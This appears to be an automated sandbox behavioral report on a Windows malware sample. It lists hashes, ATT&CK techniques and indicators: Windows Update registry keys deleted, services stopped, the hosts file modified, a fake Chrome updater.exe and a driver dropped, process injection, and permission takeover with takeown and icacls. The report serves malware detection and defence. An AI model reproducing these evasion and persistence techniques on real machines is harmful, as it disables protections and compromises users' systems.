6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915

Analysis

max time kernel
150s
max time network
100s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
13-11-2022 18:45

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe
Size

2.7MB
MD5

cff0e1b4af4ef5a2d4cb78ea5d403d58
SHA1

5224506ce265475452aeddf540f5f9b996f84bd6
SHA256

6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915
SHA512

55cfed7b7a95c71afd8191116f03829b8c51661cf1de035652e08b8ae4b8003f569ca6e198748167e626d17edb7012fe535aa08e8af2e09d2440880088fa2c40
SSDEEP

49152:YX9bvpxA+I4AY+a7xIrLlxJq5ZjoVrY4u0uXh/DP+P:2DnNExInjojwRK

Score

10^/10

discovery evasion exploit

Malware Config

Signatures

Modifies security service 2 TTPs 5 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

reg.exe

description	ioc	process
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1	reg.exe
Key deleted	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo	reg.exe

Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs

Processes:

WerFault.exe

description pid process target process

PID 1856 created 3708 1856 WerFault.exe DllHost.exe

description	pid	process	target process
PID 1856 created 3708	1856	WerFault.exe	DllHost.exe

Suspicious use of NtCreateUserProcessOtherParentProcess 6 IoCs

Processes:

powershell.EXEsvchost.exepowershell.EXE

description	pid	process	target process
PID 4736 created 612	4736	powershell.EXE	winlogon.exe
PID 4588 created 4156	4588	svchost.exe	DllHost.exe
PID 4588 created 3708	4588	svchost.exe	DllHost.exe
PID 4796 created 612	4796	powershell.EXE	winlogon.exe
PID 4796 created 612	4796	powershell.EXE	winlogon.exe
PID 4588 created 3708	4588	svchost.exe	DllHost.exe

Drops file in Drivers directory 2 IoCs

Processes:

6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exeupdater.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	updater.exe

Executes dropped EXE 2 IoCs

Processes:

updater.exeupdater.exe

pid process

4920 updater.exe
2272 updater.exe
Possible privilege escalation attempt 4 IoCs
exploit

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3808 takeown.exe
4144 icacls.exe
3940 takeown.exe
4832 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489
Modifies file permissions 1 TTPs 4 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exetakeown.exeicacls.exe

pid process

3808 takeown.exe
4144 icacls.exe
3940 takeown.exe
4832 icacls.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

pid	process
4920	updater.exe
2272	updater.exe

pid	process
3808	takeown.exe
4144	icacls.exe
3940	takeown.exe
4832	icacls.exe

pid	process
3808	takeown.exe
4144	icacls.exe
3940	takeown.exe
4832	icacls.exe

flow	ioc
1	ip-api.com

Drops file in System32 directory 10 IoCs

Processes:

powershell.exepowershell.EXEpowershell.EXEpowershell.exeupdater.exepowershell.exepowershell.EXEOfficeClickToRun.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\updater.exe.log	updater.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe

Suspicious use of SetThreadContext 3 IoCs

Processes:

6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exepowershell.EXEpowershell.EXE

description	pid	process	target process
PID 3520 set thread context of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 4736 set thread context of 1212	4736	powershell.EXE	dllhost.exe
PID 4796 set thread context of 2376	4796	powershell.EXE	dllhost.exe

Drops file in Program Files directory 3 IoCs

Processes:

powershell.exeupdater.exe

description	ioc	process
File created	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File opened for modification	C:\Program Files\Google\Chrome\updater.exe	powershell.exe
File created	C:\Program Files\Google\Libs\WR64.sys	updater.exe

Drops file in Windows directory 4 IoCs

Processes:

conhost.exe

description	ioc	process
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe

Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid process

5080 sc.exe
3716 sc.exe
2120 sc.exe
3156 sc.exe
3208 sc.exe
4920 sc.exe
1324 sc.exe
4740 sc.exe
4984 sc.exe
3192 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

856 3708 WerFault.exe DllHost.exe
1716 4156 WerFault.exe DllHost.exe
1856 3708 WerFault.exe DllHost.exe

pid	process
5080	sc.exe
3716	sc.exe
2120	sc.exe
3156	sc.exe
3208	sc.exe
4920	sc.exe
1324	sc.exe
4740	sc.exe
4984	sc.exe
3192	sc.exe

pid	pid_target	process	target process
856	3708	WerFault.exe	DllHost.exe
1716	4156	WerFault.exe	DllHost.exe
1856	3708	WerFault.exe	DllHost.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.exesvchost.exeOfficeClickToRun.exepowershell.exepowershell.EXEpowershell.exepowershell.EXEupdater.exedialer.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1668365176"	OfficeClickToRun.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	updater.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	updater.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	dialer.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Modifies registry key 1 TTPs 18 IoCs

Modify Registry

T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid	process
4504	reg.exe
4600	reg.exe
4780	reg.exe
4440	reg.exe
1288	reg.exe
1400	reg.exe
32	reg.exe
4584	reg.exe
2824	reg.exe
4712	reg.exe
2116	reg.exe
4540	reg.exe
4736	reg.exe
4580	reg.exe
4016	reg.exe
1668	reg.exe
1264	reg.exe
1540	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exeWerFault.exeWerFault.exesvchost.exe

pid	process
4948	powershell.exe
4948	powershell.exe
4948	powershell.exe
3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe
4060	powershell.exe
4060	powershell.exe
4060	powershell.exe
4736	powershell.EXE
4736	powershell.EXE
4736	powershell.EXE
4796	powershell.EXE
4796	powershell.EXE
4736	powershell.EXE
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
4796	powershell.EXE
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
1212	dllhost.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
856	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1716	WerFault.exe
1212	dllhost.exe
1212	dllhost.exe
4588	svchost.exe
4588	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3064 Explorer.EXE

pid	process
3064	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exe6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exetakeown.exepowershell.exepowershell.EXE

description	pid	process
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeIncreaseQuotaPrivilege	4948	powershell.exe
Token: SeSecurityPrivilege	4948	powershell.exe
Token: SeTakeOwnershipPrivilege	4948	powershell.exe
Token: SeLoadDriverPrivilege	4948	powershell.exe
Token: SeSystemProfilePrivilege	4948	powershell.exe
Token: SeSystemtimePrivilege	4948	powershell.exe
Token: SeProfSingleProcessPrivilege	4948	powershell.exe
Token: SeIncBasePriorityPrivilege	4948	powershell.exe
Token: SeCreatePagefilePrivilege	4948	powershell.exe
Token: SeBackupPrivilege	4948	powershell.exe
Token: SeRestorePrivilege	4948	powershell.exe
Token: SeShutdownPrivilege	4948	powershell.exe
Token: SeDebugPrivilege	4948	powershell.exe
Token: SeSystemEnvironmentPrivilege	4948	powershell.exe
Token: SeRemoteShutdownPrivilege	4948	powershell.exe
Token: SeUndockPrivilege	4948	powershell.exe
Token: SeManageVolumePrivilege	4948	powershell.exe
Token: 33	4948	powershell.exe
Token: 34	4948	powershell.exe
Token: 35	4948	powershell.exe
Token: 36	4948	powershell.exe
Token: SeDebugPrivilege	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe
Token: SeShutdownPrivilege	4320	powercfg.exe
Token: SeCreatePagefilePrivilege	4320	powercfg.exe
Token: SeShutdownPrivilege	2328	powercfg.exe
Token: SeCreatePagefilePrivilege	2328	powercfg.exe
Token: SeShutdownPrivilege	4080	powercfg.exe
Token: SeCreatePagefilePrivilege	4080	powercfg.exe
Token: SeShutdownPrivilege	4932	powercfg.exe
Token: SeCreatePagefilePrivilege	4932	powercfg.exe
Token: SeTakeOwnershipPrivilege	3808	takeown.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	4736	powershell.EXE
Token: SeIncreaseQuotaPrivilege	4060	powershell.exe
Token: SeSecurityPrivilege	4060	powershell.exe
Token: SeTakeOwnershipPrivilege	4060	powershell.exe
Token: SeLoadDriverPrivilege	4060	powershell.exe
Token: SeSystemProfilePrivilege	4060	powershell.exe
Token: SeSystemtimePrivilege	4060	powershell.exe
Token: SeProfSingleProcessPrivilege	4060	powershell.exe
Token: SeIncBasePriorityPrivilege	4060	powershell.exe
Token: SeCreatePagefilePrivilege	4060	powershell.exe
Token: SeBackupPrivilege	4060	powershell.exe
Token: SeRestorePrivilege	4060	powershell.exe
Token: SeShutdownPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeSystemEnvironmentPrivilege	4060	powershell.exe
Token: SeRemoteShutdownPrivilege	4060	powershell.exe
Token: SeUndockPrivilege	4060	powershell.exe
Token: SeManageVolumePrivilege	4060	powershell.exe
Token: 33	4060	powershell.exe
Token: 34	4060	powershell.exe
Token: 35	4060	powershell.exe
Token: 36	4060	powershell.exe
Token: SeIncreaseQuotaPrivilege	4060	powershell.exe
Token: SeSecurityPrivilege	4060	powershell.exe
Token: SeTakeOwnershipPrivilege	4060	powershell.exe
Token: SeLoadDriverPrivilege	4060	powershell.exe
Token: SeSystemProfilePrivilege	4060	powershell.exe
Token: SeSystemtimePrivilege	4060	powershell.exe
Token: SeProfSingleProcessPrivilege	4060	powershell.exe
Token: SeIncBasePriorityPrivilege	4060	powershell.exe
Token: SeCreatePagefilePrivilege	4060	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

dwm.exe

pid process

1020 dwm.exe
1020 dwm.exe
Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exe

pid process

4668 Conhost.exe
2340 Conhost.exe
3284 Conhost.exe
2864 Conhost.exe
4412 Conhost.exe
1876 Conhost.exe

pid	process
1020	dwm.exe
1020	dwm.exe

pid	process
4668	Conhost.exe
2340	Conhost.exe
3284	Conhost.exe
2864	Conhost.exe
4412	Conhost.exe
1876	Conhost.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.execmd.execmd.exepowershell.EXE

description	pid	process	target process
PID 3520 wrote to memory of 4948	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	powershell.exe
PID 3520 wrote to memory of 4948	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	powershell.exe
PID 3520 wrote to memory of 1224	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	cmd.exe
PID 3520 wrote to memory of 1224	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	cmd.exe
PID 3520 wrote to memory of 4288	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	cmd.exe
PID 3520 wrote to memory of 4288	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	cmd.exe
PID 1224 wrote to memory of 4984	1224	cmd.exe	sc.exe
PID 1224 wrote to memory of 4984	1224	cmd.exe	sc.exe
PID 4288 wrote to memory of 4320	4288	cmd.exe	powercfg.exe
PID 4288 wrote to memory of 4320	4288	cmd.exe	powercfg.exe
PID 1224 wrote to memory of 3156	1224	cmd.exe	sc.exe
PID 1224 wrote to memory of 3156	1224	cmd.exe	sc.exe
PID 4288 wrote to memory of 2328	4288	cmd.exe	powercfg.exe
PID 4288 wrote to memory of 2328	4288	cmd.exe	powercfg.exe
PID 1224 wrote to memory of 3192	1224	cmd.exe	sc.exe
PID 1224 wrote to memory of 3192	1224	cmd.exe	sc.exe
PID 1224 wrote to memory of 3208	1224	cmd.exe	sc.exe
PID 1224 wrote to memory of 3208	1224	cmd.exe	sc.exe
PID 4288 wrote to memory of 4080	4288	cmd.exe	powercfg.exe
PID 4288 wrote to memory of 4080	4288	cmd.exe	powercfg.exe
PID 1224 wrote to memory of 4920	1224	cmd.exe	sc.exe
PID 1224 wrote to memory of 4920	1224	cmd.exe	sc.exe
PID 4288 wrote to memory of 4932	4288	cmd.exe	powercfg.exe
PID 4288 wrote to memory of 4932	4288	cmd.exe	powercfg.exe
PID 1224 wrote to memory of 4580	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4580	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4504	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4504	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4016	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4016	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4584	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4584	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4600	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 4600	1224	cmd.exe	reg.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 3520 wrote to memory of 3992	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	conhost.exe
PID 1224 wrote to memory of 3808	1224	cmd.exe	takeown.exe
PID 1224 wrote to memory of 3808	1224	cmd.exe	takeown.exe
PID 1224 wrote to memory of 4144	1224	cmd.exe	icacls.exe
PID 1224 wrote to memory of 4144	1224	cmd.exe	icacls.exe
PID 3520 wrote to memory of 4060	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	powershell.exe
PID 3520 wrote to memory of 4060	3520	6819bca79d5d9598839e9dcfa1a12feb607e4d269a52b016949a9996c2598915.exe	powershell.exe
PID 1224 wrote to memory of 1668	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 1668	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 1400	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 1400	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 1264	1224	cmd.exe	reg.exe
PID 1224 wrote to memory of 1264	1224	cmd.exe	reg.exe
PID 4736 wrote to memory of 1212	4736	powershell.EXE	dllhost.exe
PID 4736 wrote to memory of 1212	4736	powershell.EXE	dllhost.exe
PID 4736 wrote to memory of 1212	4736	powershell.EXE	dllhost.exe
PID 4736 wrote to memory of 1212	4736	powershell.EXE	dllhost.exe
PID 4736 wrote to memory of 1212	4736	powershell.EXE	dllhost.exe
PID 4736 wrote to memory of 1212	4736	powershell.EXE	dllhost.exe
PID 4736 wrote to memory of 1212	4736	powershell.EXE	dllhost.exe

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:668

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:612

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
- Suspicious use of FindShellTrayWindow
PID:1020

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{42b731ee-0dad-4717-9e34-c6a29e491194}
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:1212

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{7a26d72e-6c42-4917-8873-17482f1d4db8}
2⤵
PID:3040

C:\Windows\SysWOW64\dllhost.exe
C:\Windows\SysWOW64\dllhost.exe /Processid:{7a26d72e-6c42-4917-8873-17482f1d4db8}
2⤵
PID:2376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:932

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1148

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1472

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1792

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2196

c:\windows\system32\taskhostw.exe
